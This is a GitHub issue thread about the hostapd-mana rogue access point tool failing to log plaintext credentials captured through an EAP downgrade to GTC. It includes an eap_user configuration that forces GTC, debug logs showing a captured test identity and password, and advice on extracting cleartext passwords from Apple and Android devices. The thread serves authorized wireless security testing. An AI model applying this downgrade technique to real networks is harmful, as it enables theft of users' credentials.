Creds not logged #13
Comments
|
I think you may have just found the bug I've been chasing but unable to replicate. Will take a look thanks.
…Sent from my phone
On 02 May 2017, at 2:18 PM, Lexus89 ***@***.***> wrote:
When performing a EAP dumb-down attack by asking for GTC, the plain text credentials do not appear in the log (also referenced #12). I set the ennode configuration to a log file. Perhaps not all methods are stored in logs?
hostapd.eap_user:
"t" PEAP,GTC,TTLS-MSCHAPV2,MSCHAPV2,MD5,TTLS-PAP,TTLS-CHAP,TTLS-MSCHAP,TTLS "1234test" [2]
Hostapd log:
EAP-PEAP: Decrypted Phase 2 EAP - hexdump(len=11): 02 0c 00 0b 01 68 61 63 6b 65 72
EAP-PEAP: received Phase 2: code=2 identifier=12 length=11
EAP-Identity: Peer identity - hexdump_ascii(len=6):
68 61 63 6b 65 72 hacker
MANA (EAP) : identity: hacker
...
EAP-PEAP: Decrypted Phase 2 EAP - hexdump(len=15): 02 0e 00 0f 06 70 61 73 73 77 6f 72 64 30 31
EAP-PEAP: received Phase 2: code=2 identifier=14 length=15
EAP-GTC: Response - hexdump_ascii(len=10):
70 61 73 73 77 6f 72 64 30 31 password01
EAP-GTC: Done - Failure
EAP-PEAP: Phase2 method failed
EAP-PEAP: PHASE2_METHOD -> FAILURE_REQ
EAP: EAP entering state METHOD_REQUEST
EAP: building EAP-Request: Identifier 15
EAP-PEAP: Encrypting Phase 2 data - hexdump(len=4): 04 0f 00 04
—
You are receiving this because you are subscribed to this thread.
Reply to this email directly, view it on GitHub, or mute the thread.
|
|
Hi, Regards |
|
I believe it was by changing the order of methods in the hostapd.eap_user file.. |
|
Hi, Thanks for the reply, do you have an example file I can see? Regards |
|
I log PAP plaintext, not GTC. Will add it. Thanks. |
|
https://twitter.com/W00Tock/status/1019251419310972930 Edit file "hostapd-wpe.eap_user" (You can replace PEAP with FAST) PEAP [ver=1] By configuring the eap)user file, you can request from Apple and Android devices a GTC clear text password - which is shown in the debug console, but is currently not logged. Thanks Singe, thought this might help you find that bug... |
|
Thanks everyone. I now log GTC, you can see the code at https://github.com/sensepost/hostapd-mana/blob/master/src/eap_server/eap_server.c#L2136 |
When performing a EAP dumb-down attack by asking for GTC, the plain text credentials do not appear in the log (also referenced #12). I set the ennode configuration to a log file. Perhaps not all methods are stored in logs?
hostapd.eap_user:
"t" PEAP,GTC,TTLS-MSCHAPV2,MSCHAPV2,MD5,TTLS-PAP,TTLS-CHAP,TTLS-MSCHAP,TTLS "1234test" [2]
Hostapd log:
EAP-PEAP: Decrypted Phase 2 EAP - hexdump(len=11): 02 0c 00 0b 01 68 61 63 6b 65 72
EAP-PEAP: received Phase 2: code=2 identifier=12 length=11
EAP-Identity: Peer identity - hexdump_ascii(len=6):
68 61 63 6b 65 72 hacker
MANA (EAP) : identity: hacker
...
EAP-PEAP: Decrypted Phase 2 EAP - hexdump(len=15): 02 0e 00 0f 06 70 61 73 73 77 6f 72 64 30 31
EAP-PEAP: received Phase 2: code=2 identifier=14 length=15
EAP-GTC: Response - hexdump_ascii(len=10):
70 61 73 73 77 6f 72 64 30 31 password01
EAP-GTC: Done - Failure
EAP-PEAP: Phase2 method failed
EAP-PEAP: PHASE2_METHOD -> FAILURE_REQ
EAP: EAP entering state METHOD_REQUEST
EAP: building EAP-Request: Identifier 15
EAP-PEAP: Encrypting Phase 2 data - hexdump(len=4): 04 0f 00 04
The text was updated successfully, but these errors were encountered: